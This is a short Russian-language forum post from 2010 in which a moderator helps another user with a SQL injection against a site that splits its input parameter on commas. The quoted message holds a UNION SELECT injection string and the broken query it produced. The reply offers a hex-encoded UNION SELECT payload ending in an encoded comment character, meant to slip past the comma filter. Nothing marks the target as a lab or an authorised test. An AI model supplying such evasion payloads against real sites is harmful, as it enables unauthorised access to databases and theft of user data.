12.05.2010, 09:12
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
С нами:
9154406
Репутация:
2221
|
|
Сообщение от zuzzz
так не получится. Я же писал, что параметр разбивается на части по запятым.
и если отправить параметр равный "123') union select 11,22,33 from users where (id='345"
то получится такая фигня :
name FROM users WHERE id != 1 AND (id='123') union select 11' OR id='22' OR id='33 from users where (id='345') ...
т.к. присутствуют запятые
и похоже это не mysql по этому и коментарий не рабтает. Как определить какая это база?
Ааа вот оно что, попробуй значит.
1234') union select 0x756e696f6e2073656c65637420312c322c332c342c352c36 2c372c38 .... %23
|
|
|